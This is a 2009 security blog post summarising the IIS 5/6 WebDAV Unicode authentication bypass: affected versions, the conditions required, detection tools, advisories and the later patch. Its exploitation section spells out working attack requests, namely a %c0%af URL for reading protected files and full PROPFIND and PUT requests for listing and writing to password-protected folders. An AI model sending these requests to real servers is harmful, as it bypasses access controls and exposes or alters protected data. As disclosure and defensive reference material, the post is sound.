Microsoft IIS WebDAV Remote Authentication Bypass

Posted by Trancer on May 21 2009

Microsoft Corporation Now this is a classy, few days ago Kingcope (Nicolaos Rangos) disclosed a remote authentication bypass vulnerability in Microsoft IIS 6 WebDAV service. In the advisory Kingcope details some of this vulnerability attack vectors, such as reading files within password protected folders and directory listing password protected WebDAV folders. It is also possible to upload files to a WebDAV protected folders in some server configurations. This vulnerability is possible because WebDAV fails to properly handle Unicode character ‘/’ (%c0%af).

This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001, what a fun vulnerability it was ^_^.

Microsoft have released a security advisory (971492) and the SRD team published two posts clearing a lot of this vulnerability details:
More information about the IIS authentication bypass.
Answers to the IIS WebDAV authentication bypass questions.

Here’s a summary of the details so far:

Microsoft IIS 5.0 (Windows Server 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable.
Microsoft IIS 7.0 (Windows Server 2008) is safe.
To exploit this vulnerability, WebDAV service must be enabled.
WebDAV is disabled by default in IIS 6.0.
To exploit this vulnerability, IIS server must use IIS permissions to restrict a subfolder of content to authenticated users.
IIS server that doesn’t use IIS permissions to restrict content to authenticated users is safe.
To exploit this vulnerability, file system access must be granted for the restricted content to the IUSR_[MachineName] account.
IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe.
A parent folder of the private subfolder must allow anonymous access.
The vulnerability effects websites implementing basic, digest, or integrated windows authentication (NTLM).
IIS server that hosts web applications using only forms-based authentication is safe.
If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server.
Microsoft SharePoint Server is safe.
Microsoft Outlook Web Access (OWA) Server is safe.

Exploiting the WebDAV remote authentication bypass vulnerability

Authentication bypass of password protected folders:
http://www.vulnerable.com/webdav%c0%af/sensitive.zip

Directory listing of password protected folders:
PROPFIND /web%c0%afdav/ HTTP/1.1 Host: www.vulnerable.com Connection: TE TE: trailers Depth: 1 Content-Length: 288 Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?> <propfind xmlns="DAV:"><prop> <getcontentlength xmlns="DAV:"/> <getlastmodified xmlns="DAV:"/> <executable xmlns="http://apache.org/dav/props/"/> <resourcetype xmlns="DAV:"/> <checked-in xmlns="DAV:"/> <checked-out xmlns="DAV:"/> </prop></propfind>

Writing files to password protected folders:
PUT /web%c0%afdav/foo.html HTTP/1.1 Host: www.vulnerable.com Translate: f Content-Length: 15 Content-Type: text/html

<h1>w00t!!</h1>

Testing tools

Metasploit added ms09_020_webdav_unicode_bypass.rb to detect vulnerable IIS6 WebDAV Unicode bypass folders.
Ron wrote a script for Nmap to detect vulnerable IIS6 WebDAV servers – script http-iis-webdav-vuln.nse.

Further information

Thierry Zoller wrote a great post covering most of the vulnerability details, updating in real time – Secdev – IIS 6 / IIS 5 / IIS 5.1+ Webdav auth bypass.
Great writeup by Ron Bowes and Andrew Orr from SkullSecurity – WebDAV Detection, Vulnerability Checking and Exploitation.
A video by Kingcope demonstrating the vulnerability on milw0rm – IIS WebDAV Vulnerability in Action.
SecurityFocus advisory – BID 34993.
US-CERT Vulnerability Note VU#787932 – VU#787932.

That’s it for now, great find by kcope indeed.

Updates:

>> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – Gives interesting information about this vulnerability and IDS/IPS signature evasion techniques.
In addition, ET added an HTTP WebDAV Scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb.
From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap.

>> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows to bypass IP address and domain name restrictions configurations. This keeps getting better and better… :-)

>> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability.

>> Microsoft patch IIS WebDAV Unicode authentication bypass vulnerability – MS09-020.
It’s about time.

Categories: Vulnerabilities

3 Comments | Comments RSS | TrackBack URL

3 Responses to “Microsoft IIS WebDAV Remote Authentication Bypass”

Trancer says:

May 21, 2009 at 01:49

On the Microsoft security advisory 971492, CVE-2009-1535 is registered for this vulnerability. Meanwhile, CVE-2009-1676 is also registered for the IIS WebDAV Unicode vulnerability.
Amit says:

May 21, 2009 at 11:26

nice ! cool exploit
Trancer says:

June 10, 2009 at 01:09

CVE’s:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1122
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1676

Recognize-Security Welcome to the Machine May 2009

Microsoft IIS WebDAV Remote Authentication Bypass Posted by Trancer on May 21 2009 Now this is a classy, few days ago Kingcope (Nicolaos Rangos) disclosed a remote authentication bypass vulnerability in Microsoft IIS 6 WebDAV service. In the advisory Kingcope details some of this vulnerability attack vectors, such as reading files within password protected folders and directory listing password protected WebDAV folders. It is also possible to upload files to a WebDAV protected folders in some server configurations. This vulnerability is possible because WebDAV fails to properly handle Unicode character ‘/’ (%c0%af). This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001, what a fun vulnerability it was ^_^. Microsoft have released a security advisory (971492) and the SRD team published two posts clearing a lot of this vulnerability details: More information about the IIS authentication bypass. Answers to the IIS WebDAV authentication bypass questions. Here’s a summary of the details so far: Microsoft IIS 5.0 (Windows Server 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable. Microsoft IIS 7.0 (Windows Server 2008) is safe. To exploit this vulnerability, WebDAV service must be enabled. WebDAV is disabled by default in IIS 6.0. To exploit this vulnerability, IIS server must use IIS permissions to restrict a subfolder of content to authenticated users. IIS server that doesn’t use IIS permissions to restrict content to authenticated users is safe. To exploit this vulnerability, file system access must be granted for the restricted content to the IUSR_[MachineName] account. IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe. A parent folder of the private subfolder must allow anonymous access. The vulnerability effects websites implementing basic, digest, or integrated windows authentication (NTLM). IIS server that hosts web applications using only forms-based authentication is safe. If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server. Microsoft SharePoint Server is safe. Microsoft Outlook Web Access (OWA) Server is safe. Exploiting the WebDAV remote authentication bypass vulnerability Authentication bypass of password protected folders: `http://www.vulnerable.com/webdav%c0%af/sensitive.zip` Directory listing of password protected folders: `PROPFIND /web%c0%afdav/ HTTP/1.1 Host: www.vulnerable.com Connection: TE TE: trailers Depth: 1 Content-Length: 288 Content-Type: application/xml` `<?xml version="1.0" encoding="utf-8"?> <propfind xmlns="DAV:"><prop> <getcontentlength xmlns="DAV:"/> <getlastmodified xmlns="DAV:"/> <executable xmlns="http://apache.org/dav/props/"/> <resourcetype xmlns="DAV:"/> <checked-in xmlns="DAV:"/> <checked-out xmlns="DAV:"/> </prop></propfind>` Writing files to password protected folders: `PUT /web%c0%afdav/foo.html HTTP/1.1 Host: www.vulnerable.com Translate: f Content-Length: 15 Content-Type: text/html` `<h1>w00t!!</h1>` Testing tools Metasploit added ms09_020_webdav_unicode_bypass.rb to detect vulnerable IIS6 WebDAV Unicode bypass folders. Ron wrote a script for Nmap to detect vulnerable IIS6 WebDAV servers – script http-iis-webdav-vuln.nse. Further information Thierry Zoller wrote a great post covering most of the vulnerability details, updating in real time – Secdev – IIS 6 / IIS 5 / IIS 5.1+ Webdav auth bypass. Great writeup by Ron Bowes and Andrew Orr from SkullSecurity – WebDAV Detection, Vulnerability Checking and Exploitation. A video by Kingcope demonstrating the vulnerability on milw0rm – IIS WebDAV Vulnerability in Action. SecurityFocus advisory – BID 34993. US-CERT Vulnerability Note VU#787932 – VU#787932. That’s it for now, great find by kcope indeed. Updates: >> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – Gives interesting information about this vulnerability and IDS/IPS signature evasion techniques. In addition, ET added an HTTP WebDAV Scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb. From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap. >> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows to bypass IP address and domain name restrictions configurations. This keeps getting better and better… :-) >> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability. >> Microsoft patch IIS WebDAV Unicode authentication bypass vulnerability – MS09-020. It’s about time. Categories: Vulnerabilities 3 Comments \| Comments RSS \| TrackBack URL 3 Responses to “Microsoft IIS WebDAV Remote Authentication Bypass” Trancer says: May 21, 2009 at 01:49 On the Microsoft security advisory 971492, CVE-2009-1535 is registered for this vulnerability. Meanwhile, CVE-2009-1676 is also registered for the IIS WebDAV Unicode vulnerability. Amit says: May 21, 2009 at 11:26 nice ! cool exploit Trancer says: June 10, 2009 at 01:09 CVE’s: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1122 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1676 Leave a Reply Click here to cancel reply. Name (required) Mail (will not be published) (required) Website	Categories Advisories Articles Exploitation Exploits LOLz Malware Metasploit Presentations Rec-Sec Security News Tools Vulnerabilities Web Application Security Archives September 2010 March 2010 January 2010 December 2009 November 2009 October 2009 September 2009 August 2009 July 2009 June 2009 May 2009 April 2009 March 2009 February 2009 December 2008 November 2008 October 2008 September 2008 August 2008 January 2008 June 2007 May 2007 April 2007 March 2007 February 2007 Pages About Links Aviv Raff BinaryVision BSDeamon Chris Evans DC9723 Didier Stevens Digital Whisper Exploit Database Exploit KB Extraexploit Julien Tinnes Michal Zalewski NiX IRC Network Nmap NullByte Pankaj Kohli Peter Van Eeckhoutte Piotr Bania rgod SkullSecurity Skypher Tavis Ormandy The Metasploit Project TryThis0ne Uninformed xorl eax, eax Yam Mesicka Meta RSS 2.0 ATOM 1.0 RDF 1.0 Links OPML OpenSearch
W3C Unicorn \| Valid XHTML \| Valid CSS \| RSS \| Comments RSS Copyright © 2007 - 2012 Recognize-Security. Some rights reserved. ~~Security~~ Hacking, However, is an art, not a science.

Recognize-Security

May 2009

Microsoft IIS WebDAV Remote Authentication Bypass

3 Responses to “Microsoft IIS WebDAV Remote Authentication Bypass”

Leave a Reply